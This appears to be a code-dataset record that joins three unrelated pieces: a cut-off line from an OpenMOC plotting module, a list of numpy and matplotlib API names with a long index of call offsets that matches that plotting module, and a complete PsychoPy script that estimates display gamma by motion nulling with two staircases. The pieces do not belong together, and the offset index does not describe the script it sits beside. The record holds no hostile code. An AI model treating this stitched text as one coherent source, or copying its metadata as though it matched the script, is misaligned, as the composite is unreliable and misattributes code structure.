              'the z-coord %f is outside the geometry z-bounds (%f, %f)', \
              zcoord, geometry.getMinZ(), geometry.getMaxZ())
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.loglog",
"numpy.sum",
"numpy.abs",
"matplotlib.pyplot.suptitle",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.arange",
"numpy.unique",
"openmoc.get_output_directory",
"matplotlib.pyplot.close",
"matplotlib.pyplot.imshow",
"matplotlib.cm.ScalarMappable",
"os.path.exists",
"matplotlib.pyplot.colorbar",
"numpy.linspace",
"numpy.real",
"numpy.random.shuffle",
"matplotlib.markers.MarkerStyle",
"matplotlib.pyplot.get_cmap",
"numpy.flipud",
"matplotlib.use",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.grid",
"os.makedirs",
"matplotlib.pyplot.ioff",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"numpy.where",
"numpy.array",
"matplotlib.pyplot.xlabel",
"numpy.ascontiguousarray",
"openmoc.LocalCoords",
"matplotlib.pyplot.savefig",
"numpy.ediff1d"
] |
[((486, 507), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (500, 507), False, 'import matplotlib\n'), ((898, 908), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (906, 908), True, 'import matplotlib.pyplot as plt\n'), ((2455, 2471), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (2463, 2471), True, 'import numpy as np\n'), ((2597, 2609), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2607, 2609), True, 'import matplotlib.pyplot as plt\n'), ((2868, 2884), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (2877, 2884), True, 'import matplotlib.pyplot as plt\n'), ((3038, 3052), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (3047, 3052), True, 'import matplotlib.pyplot as plt\n'), ((4676, 4692), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (4684, 4692), True, 'import numpy as np\n'), ((5355, 5402), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'num_fsrs'], {'endpoint': '(False)'}), '(0.0, 1.0, num_fsrs, endpoint=False)\n', (5366, 5402), True, 'import numpy as np\n'), ((5492, 5504), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5502, 5504), True, 'import matplotlib.pyplot as plt\n'), ((6053, 6075), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['suptitle'], {}), '(suptitle)\n', (6065, 6075), True, 'import matplotlib.pyplot as plt\n'), ((6078, 6094), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (6087, 6094), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6284), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (6279, 6284), True, 'import matplotlib.pyplot as plt\n'), ((9196, 9226), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)'], {}), '((gridsize, gridsize))\n', (9204, 9226), True, 'import numpy as np\n'), ((9249, 9267), 'numpy.unique', 'np.unique', (['surface'], {}), '(surface)\n', (9258, 9267), True, 'import numpy as np\n'), ((9477, 9501), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (9489, 9501), True, 'import matplotlib.pyplot as plt\n'), ((9578, 9590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9588, 9590), True, 'import matplotlib.pyplot as plt\n'), ((9602, 9619), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (9611, 9619), True, 'import numpy as np\n'), ((9622, 9734), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_materials'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_materials)\n", (9632, 9734), True, 'import matplotlib.pyplot as plt\n'), ((9745, 9770), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Materials"""'], {}), "('Materials')\n", (9757, 9770), True, 'import matplotlib.pyplot as plt\n'), ((9915, 9929), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (9924, 9929), True, 'import matplotlib.pyplot as plt\n'), ((11688, 11731), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)', 'numpy.int64'], {}), '((gridsize, gridsize), numpy.int64)\n', (11696, 11731), True, 'import numpy as np\n'), ((12730, 12760), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)'], {}), '((gridsize, gridsize))\n', (12738, 12760), True, 'import numpy as np\n'), ((12779, 12797), 'numpy.unique', 'np.unique', (['surface'], {}), '(surface)\n', (12788, 12797), True, 'import numpy as np\n'), ((12995, 13019), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', 
(['"""spectral"""'], {}), "('spectral')\n", (13007, 13019), True, 'import matplotlib.pyplot as plt\n'), ((13092, 13104), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (13102, 13104), True, 'import matplotlib.pyplot as plt\n'), ((13116, 13133), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (13125, 13133), True, 'import numpy as np\n'), ((13136, 13244), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_cells'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_cells)\n", (13146, 13244), True, 'import matplotlib.pyplot as plt\n'), ((13255, 13276), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Cells"""'], {}), "('Cells')\n", (13267, 13276), True, 'import matplotlib.pyplot as plt\n'), ((13418, 13432), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (13427, 13432), True, 'import matplotlib.pyplot as plt\n'), ((17840, 17875), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (17849, 17875), True, 'import numpy as np\n'), ((17891, 17926), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (17900, 17926), True, 'import numpy as np\n'), ((17952, 17980), 'numpy.random.shuffle', 'np.random.shuffle', (['id_colors'], {}), '(id_colors)\n', (17969, 17980), True, 'import numpy as np\n'), ((18000, 18035), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (18009, 18035), True, 'import numpy as np\n'), ((18202, 18226), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (18214, 18226), True, 'import matplotlib.pyplot as plt\n'), ((18313, 18325), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18323, 18325), True, 'import matplotlib.pyplot as plt\n'), ((18337, 18354), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (18346, 18354), True, 'import numpy as np\n'), ((18357, 18464), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_fsrs'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_fsrs)\n", (18367, 18464), True, 'import matplotlib.pyplot as plt\n'), ((19099, 19134), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Flat Source Regions"""'], {}), "('Flat Source Regions')\n", (19111, 19134), True, 'import matplotlib.pyplot as plt\n'), ((19289, 19303), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (19298, 19303), True, 'import matplotlib.pyplot as plt\n'), ((22857, 22898), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (22866, 22898), True, 'import numpy as np\n'), ((22914, 22955), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (22923, 22955), True, 'import numpy as np\n'), ((22981, 23009), 'numpy.random.shuffle', 'np.random.shuffle', (['id_colors'], {}), '(id_colors)\n', (22998, 23009), True, 'import numpy as np\n'), ((23029, 23070), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (23038, 23070), True, 'import numpy as np\n'), ((23237, 23261), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), 
"('spectral')\n", (23249, 23261), True, 'import matplotlib.pyplot as plt\n'), ((23339, 23351), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23349, 23351), True, 'import matplotlib.pyplot as plt\n'), ((23363, 23380), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (23372, 23380), True, 'import numpy as np\n'), ((23383, 23462), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=cmap)\n", (23393, 23462), True, 'import matplotlib.pyplot as plt\n'), ((23478, 23501), 'matplotlib.pyplot.title', 'plt.title', (['"""CMFD cells"""'], {}), "('CMFD cells')\n", (23487, 23501), True, 'import matplotlib.pyplot as plt\n'), ((31604, 31628), 'numpy.ediff1d', 'np.ediff1d', (['group_bounds'], {}), '(group_bounds)\n', (31614, 31628), True, 'import numpy as np\n'), ((31646, 31669), 'numpy.flipud', 'np.flipud', (['group_bounds'], {}), '(group_bounds)\n', (31655, 31669), True, 'import numpy as np\n'), ((31687, 31710), 'numpy.flipud', 'np.flipud', (['group_deltas'], {}), '(group_deltas)\n', (31696, 31710), True, 'import numpy as np\n'), ((35871, 35883), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (35881, 35883), True, 'import matplotlib.pyplot as plt\n'), ((35944, 35958), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (35956, 35958), True, 'import matplotlib.pyplot as plt\n'), ((35961, 36009), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Flat Source Region Fission Rates"""'], {}), "('Flat Source Region Fission Rates')\n", (35973, 36009), True, 'import matplotlib.pyplot as plt\n'), ((40738, 40781), 'numpy.linspace', 'np.linspace', (['bounds[0]', 'bounds[1]', 'gridsize'], {}), '(bounds[0], bounds[1], gridsize)\n', (40749, 40781), True, 'import numpy as np\n'), ((40794, 40837), 'numpy.linspace', 'np.linspace', (['bounds[2]', 'bounds[3]', 'gridsize'], {}), '(bounds[2], bounds[3], gridsize)\n', (40805, 40837), True, 'import numpy as np\n'), ((1516, 1546), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (1544, 1546), False, 'import openmoc\n'), ((1612, 1637), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (1626, 1637), False, 'import os\n'), ((1643, 1665), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (1654, 1665), False, 'import os\n'), ((2644, 2710), 'matplotlib.pyplot.plot', 'plt.plot', (['[x[i * 2], x[i * 2 + 1]]', '[y[i * 2], y[i * 2 + 1]]', '"""b-"""'], {}), "([x[i * 2], x[i * 2 + 1]], [y[i * 2], y[i * 2 + 1]], 'b-')\n", (2652, 2710), True, 'import matplotlib.pyplot as plt\n'), ((3643, 3673), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (3671, 3673), False, 'import openmoc\n'), ((3739, 3764), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (3753, 3764), False, 'import os\n'), ((3770, 3792), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (3781, 3792), False, 'import os\n'), ((5604, 5623), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""jet"""'], {}), "('jet')\n", (5616, 5623), True, 'import matplotlib.pyplot as plt\n'), ((5699, 5729), 'matplotlib.cm.ScalarMappable', 'cmx.ScalarMappable', ([], {'norm': 'cNorm'}), '(norm=cNorm)\n', (5717, 5729), True, 'import matplotlib.cm as cmx\n'), ((5795, 5864), 'matplotlib.pyplot.plot', 'plt.plot', (['[x[i * 2], x[i * 2 + 1]]', '[y[i * 2], y[i * 2 + 1]]'], {'c': 'color'}), '([x[i * 2], x[i * 2 + 
1]], [y[i * 2], y[i * 2 + 1]], c=color)\n', (5803, 5864), True, 'import matplotlib.pyplot as plt\n'), ((7235, 7265), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (7263, 7265), False, 'import openmoc\n'), ((7331, 7356), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (7345, 7356), False, 'import os\n'), ((7362, 7384), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (7373, 7384), False, 'import os\n'), ((9327, 9359), 'numpy.where', 'np.where', (['(surface == material_id)'], {}), '(surface == material_id)\n', (9335, 9359), True, 'import numpy as np\n'), ((10867, 10897), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (10895, 10897), False, 'import openmoc\n'), ((10963, 10988), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (10977, 10988), False, 'import os\n'), ((10994, 11016), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (11005, 11016), False, 'import os\n'), ((12849, 12877), 'numpy.where', 'np.where', (['(surface == cell_id)'], {}), '(surface == cell_id)\n', (12857, 12877), True, 'import numpy as np\n'), ((14751, 14781), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (14779, 14781), False, 'import openmoc\n'), ((14847, 14872), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (14861, 14872), False, 'import os\n'), ((14878, 14900), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (14889, 14900), False, 'import os\n'), ((18745, 18833), 'matplotlib.pyplot.scatter', 'plt.scatter', (['centroids_x', 'centroids_y'], {'color': '"""k"""', 'marker': 'marker_type', 's': 'marker_size'}), "(centroids_x, centroids_y, color='k', marker=marker_type, s=\n marker_size)\n", (18756, 18833), True, 'import matplotlib.pyplot as plt\n'), ((20672, 20702), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (20700, 20702), False, 'import openmoc\n'), ((20768, 20793), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (20782, 20793), False, 'import os\n'), ((20799, 20821), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (20810, 20821), False, 'import os\n'), ((24535, 24565), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (24563, 24565), False, 'import openmoc\n'), ((24631, 24656), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (24645, 24656), False, 'import os\n'), ((24662, 24684), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (24673, 24684), False, 'import os\n'), ((27325, 27337), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (27335, 27337), True, 'import matplotlib.pyplot as plt\n'), ((27412, 27426), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (27424, 27426), True, 'import matplotlib.pyplot as plt\n'), ((27682, 27696), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (27691, 27696), True, 'import matplotlib.pyplot as plt\n'), ((29034, 29064), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (29062, 29064), False, 'import openmoc\n'), ((29130, 29155), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (29144, 29155), False, 'import os\n'), ((29161, 29183), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (29172, 29183), False, 'import os\n'), ((31843, 31879), 'numpy.zeros', 'np.zeros', 
(['num_groups'], {'dtype': 'np.float'}), '(num_groups, dtype=np.float)\n', (31851, 31879), True, 'import numpy as np\n'), ((32192, 32204), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (32202, 32204), True, 'import matplotlib.pyplot as plt\n'), ((32968, 32988), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy"""'], {}), "('Energy')\n", (32978, 32988), True, 'import matplotlib.pyplot as plt\n'), ((32993, 33011), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (33003, 33011), True, 'import matplotlib.pyplot as plt\n'), ((33069, 33079), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (33077, 33079), True, 'import matplotlib.pyplot as plt\n'), ((33210, 33252), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {'bbox_inches': '"""tight"""'}), "(filename, bbox_inches='tight')\n", (33221, 33252), True, 'import matplotlib.pyplot as plt\n'), ((33257, 33271), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (33266, 33271), True, 'import matplotlib.pyplot as plt\n'), ((34055, 34085), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (34083, 34085), False, 'import openmoc\n'), ((34151, 34176), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (34165, 34176), False, 'import os\n'), ((34182, 34204), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (34193, 34204), False, 'import os\n'), ((35897, 35915), 'numpy.flipud', 'np.flipud', (['surface'], {}), '(surface)\n', (35906, 35915), True, 'import numpy as np\n'), ((37184, 37214), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (37212, 37214), False, 'import openmoc\n'), ((37280, 37305), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (37294, 37305), False, 'import os\n'), ((37311, 37333), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (37322, 37333), False, 'import os\n'), ((8443, 8476), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (8462, 8476), False, 'import openmoc\n'), ((11995, 12028), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (12014, 12028), False, 'import openmoc\n'), ((17060, 17093), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (17079, 17093), False, 'import openmoc\n'), ((21976, 22009), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (21995, 22009), False, 'import openmoc\n'), ((22310, 22327), 'numpy.isnan', 'np.isnan', (['cell_id'], {}), '(cell_id)\n', (22318, 22327), True, 'import numpy as np\n'), ((26665, 26698), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (26684, 26698), False, 'import openmoc\n'), ((26929, 26945), 'numpy.isnan', 'np.isnan', (['fsr_id'], {}), '(fsr_id)\n', (26937, 26945), True, 'import numpy as np\n'), ((27353, 27383), 'numpy.flipud', 'np.flipud', (['fluxes[index, :, :]'], {}), '(fluxes[index, :, :])\n', (27362, 27383), True, 'import numpy as np\n'), ((31250, 31289), 'numpy.arange', 'np.arange', (['(num_groups + 1)'], {'dtype': 'np.int'}), '(num_groups + 1, dtype=np.int)\n', (31259, 31289), True, 'import numpy as np\n'), ((32096, 32125), 'numpy.sum', 'np.sum', (['(group_deltas * fluxes)'], {}), '(group_deltas * fluxes)\n', (32102, 32125), True, 'import numpy as np\n'), ((35390, 35423), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 
'zcoord'], {}), '(x, y, zcoord)\n', (35409, 35423), False, 'import openmoc\n'), ((35654, 35670), 'numpy.isnan', 'np.isnan', (['fsr_id'], {}), '(fsr_id)\n', (35662, 35670), True, 'import numpy as np\n'), ((37693, 37732), 'numpy.arange', 'np.arange', (['(1)', '(iramsolver._num_modes + 1)'], {}), '(1, iramsolver._num_modes + 1)\n', (37702, 37732), True, 'import numpy as np\n'), ((38913, 38943), 'numpy.ascontiguousarray', 'np.ascontiguousarray', (['eigenvec'], {}), '(eigenvec)\n', (38933, 38943), True, 'import numpy as np\n'), ((39096, 39112), 'numpy.abs', 'np.abs', (['eigenvec'], {}), '(eigenvec)\n', (39102, 39112), True, 'import numpy as np\n'), ((32367, 32485), 'matplotlib.pyplot.loglog', 'plt.loglog', (['group_bounds[group:group + 2]', '([fluxes[group]] * 2)'], {'linewidth': '(3)', 'c': '"""b"""', 'label': '"""openmoc"""', 'linestyle': '"""-"""'}), "(group_bounds[group:group + 2], [fluxes[group]] * 2, linewidth=3,\n c='b', label='openmoc', linestyle='-')\n", (32377, 32485), True, 'import matplotlib.pyplot as plt\n'), ((32518, 32635), 'matplotlib.pyplot.plot', 'plt.plot', (['group_bounds[group:group + 2]', '([fluxes[group]] * 2)'], {'linewidth': '(3)', 'c': '"""b"""', 'label': '"""openmoc"""', 'linestyle': '"""-"""'}), "(group_bounds[group:group + 2], [fluxes[group]] * 2, linewidth=3, c\n ='b', label='openmoc', linestyle='-')\n", (32526, 32635), True, 'import matplotlib.pyplot as plt\n'), ((38960, 38977), 'numpy.real', 'np.real', (['eigenvec'], {}), '(eigenvec)\n', (38967, 38977), True, 'import numpy as np\n'), ((15749, 15781), 'matplotlib.markers.MarkerStyle', 'matplotlib.markers.MarkerStyle', ([], {}), '()\n', (15779, 15781), False, 'import matplotlib\n'), ((32731, 32824), 'matplotlib.pyplot.loglog', 'plt.loglog', (['([group_bounds[group + 1]] * 2)', 'fluxes[group:group + 2]'], {'c': '"""b"""', 'linestyle': '"""--"""'}), "([group_bounds[group + 1]] * 2, fluxes[group:group + 2], c='b',\n linestyle='--')\n", (32741, 32824), True, 'import matplotlib.pyplot as plt\n'), ((32861, 32952), 'matplotlib.pyplot.plot', 'plt.plot', (['([group_bounds[group + 1]] * 2)', 'fluxes[group:group + 2]'], {'c': '"""b"""', 'linestyle': '"""--"""'}), "([group_bounds[group + 1]] * 2, fluxes[group:group + 2], c='b',\n linestyle='--')\n", (32869, 32952), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Determine screen gamma using motion-nulling method
of <NAME> Smith, 1994, Vision Research, 34, 2727-2740
A similar system had been used earlier for chromatic isoluminance:
Anstis SM, <NAME>. A minimum motion technique for judging equiluminance.
In: Sharpe MJD & LT Colour vision: Psychophysics and physiology. London: Academic Press; 1983. pp. 66-77.
Instructions: on each trial press the up/down cursor keys depending on
the apparent direction of motion of the bars.
"""
from __future__ import absolute_import, division, print_function
from builtins import next
from builtins import range
from psychopy import visual, core, event, gui, data
from psychopy.tools.filetools import fromFile, toFile
from psychopy.visual import filters
import numpy as num
import time
try:
# try to load previous info
info = fromFile('info_gamma.pickle')
print(info)
except Exception:
# if no file use some defaults
info = {}
info['lumModNoise'] = 0.5
info['lumModLum'] = 0.1
info['contrastModNoise'] = 1.0
info['observer'] = ''
info['highGamma'] = 3.0
info['lowGamma'] = 0.8
info['nTrials'] = 50
dlg = gui.DlgFromDict(info)
# save to a file for future use (ie storing as defaults)
if dlg.OK:
toFile('info_gamma.pickle', info)
else:
core.quit() # user cancelled. quit
print(info)
info['timeStr']=time.strftime("%b_%d_%H%M", time.localtime())
nFrames = 3
cyclesTime = 2
cyclesSpace = 2
pixels = 128
win = visual.Window((1024, 768), units='pix', allowGUI=True, bitsMode=None)
visual.TextStim(win, text='building stimuli').draw()
win.flip()
globalClock = core.Clock()
# for luminance modulated noise
noiseMatrix = num.random.randint(0, 2, [pixels, pixels]) # * noiseContrast
noiseMatrix = noiseMatrix * 2.0-1 # into range -1: 1
stimFrames = []; lumGratings=[]
# create the 4 frames of the sequence (luminance and contrast modulated noise in quadrature)
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=0))
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0 / pixels, ori=90,
tex= (noiseMatrix * info['lumModNoise'] + lumGratings[0] * info['lumModLum'])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=90) / 2.0 + 0.5)
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['contrastModNoise'] * lumGratings[1])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=180))
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['lumModNoise'] + lumGratings[2] * info['lumModLum'])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=270) / 2.0 + 0.5)
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['contrastModNoise'] * lumGratings[3])
))
stairCases = []
# two staircases - one from the top, one from below - to average
stairCases.append(data.StairHandler(startVal=info['highGamma'], nTrials=info['nTrials'],
stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',
nUp=1, nDown=1))
stairCases.append(data.StairHandler(startVal=info['lowGamma'], nTrials=info['nTrials'],
stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',
nUp=1, nDown=1))
def getResponse(direction):
"""if subject said up when direction was up ( + 1) then increase gamma
Otherwise, decrease gamma"""
event.clearEvents() # clear the event buffer to start with
while 1: # forever until we return
for key in event.getKeys():
# quit
if key in ['escape', 'q']:
win.close()
# win.bits.reset()
core.quit()
# valid response - check to see if correct
elif key in ['down', 'up']:
if ((key in ['down'] and direction == -1) or
(key in ['up'] and direction == +1)):
return 0
else:
return 1
else:
print("hit DOWN or UP (or Esc) (You hit %s)" %key)
def presentStimulus(direction):
"""Present stimulus drifting in a given direction (for low gamma)
where:
direction = + 1(up) or -1(down)
"""
win.fps()
startPhase = num.random.random()
if direction == 1:
frameIndices = num.arange(0, 4)
else:
frameIndices = num.arange(3, -1, -1)
for cycles in range(cyclesTime):
# cycle through the 4 frames
for ii in frameIndices:
thisStim = stimFrames[ii]
thisStim.setPhase(startPhase)
for n in range(nFrames):
# present for several constant frames (TF)
thisStim.draw()
win.flip()
# then blank the screen
win.flip()
# run the staircase
for trialN in range(info['nTrials']):
for stairCase in stairCases:
thisGamma = next(stairCase)
t = globalClock.getTime()
win.gamma = [thisGamma, thisGamma, thisGamma]
direction = num.random.randint(0, 2) * 2-1 # a random number -1 or 1
presentStimulus(direction)
ans = getResponse(direction)
stairCase.addData(ans)
win.flip()
core.wait(0.5)
win.close()
# save data
fileName = gui.fileSaveDlg('.', '%s_%s' %(info['observer'], info['timeStr']))
stairCases[1].saveAsPickle(fileName + 'hi')
stairCases[1].saveAsText(fileName + 'hi')
stairCases[0].saveAsPickle(fileName + 'lo')
stairCases[0].saveAsText(fileName + 'lo')
print('That took %.1fmins' % (globalClock.getTime() / 60.0))
core.quit()
# The contents of this file are in the public domain.
|
[
"numpy.random.randint",
"numpy.arange",
"psychopy.tools.filetools.toFile",
"psychopy.event.clearEvents",
"psychopy.gui.DlgFromDict",
"builtins.range",
"psychopy.event.getKeys",
"psychopy.tools.filetools.fromFile",
"builtins.next",
"psychopy.visual.Window",
"psychopy.core.quit",
"time.localtime",
"psychopy.data.StairHandler",
"psychopy.gui.fileSaveDlg",
"psychopy.core.Clock",
"psychopy.core.wait",
"psychopy.visual.TextStim",
"psychopy.visual.GratingStim",
"numpy.random.random",
"psychopy.visual.filters.makeGrating"
] |
[((1183, 1204), 'psychopy.gui.DlgFromDict', 'gui.DlgFromDict', (['info'], {}), '(info)\n', (1198, 1204), False, 'from psychopy import visual, core, event, gui, data\n'), ((1495, 1564), 'psychopy.visual.Window', 'visual.Window', (['(1024, 768)'], {'units': '"""pix"""', 'allowGUI': '(True)', 'bitsMode': 'None'}), "((1024, 768), units='pix', allowGUI=True, bitsMode=None)\n", (1508, 1564), False, 'from psychopy import visual, core, event, gui, data\n'), ((1645, 1657), 'psychopy.core.Clock', 'core.Clock', ([], {}), '()\n', (1655, 1657), False, 'from psychopy import visual, core, event, gui, data\n'), ((1705, 1747), 'numpy.random.randint', 'num.random.randint', (['(0)', '(2)', '[pixels, pixels]'], {}), '(0, 2, [pixels, pixels])\n', (1723, 1747), True, 'import numpy as num\n'), ((5136, 5158), 'builtins.range', 'range', (["info['nTrials']"], {}), "(info['nTrials'])\n", (5141, 5158), False, 'from builtins import range\n'), ((5512, 5526), 'psychopy.core.wait', 'core.wait', (['(0.5)'], {}), '(0.5)\n', (5521, 5526), False, 'from psychopy import visual, core, event, gui, data\n'), ((5564, 5631), 'psychopy.gui.fileSaveDlg', 'gui.fileSaveDlg', (['"""."""', "('%s_%s' % (info['observer'], info['timeStr']))"], {}), "('.', '%s_%s' % (info['observer'], info['timeStr']))\n", (5579, 5631), False, 'from psychopy import visual, core, event, gui, data\n'), ((5866, 5877), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (5875, 5877), False, 'from psychopy import visual, core, event, gui, data\n'), ((865, 894), 'psychopy.tools.filetools.fromFile', 'fromFile', (['"""info_gamma.pickle"""'], {}), 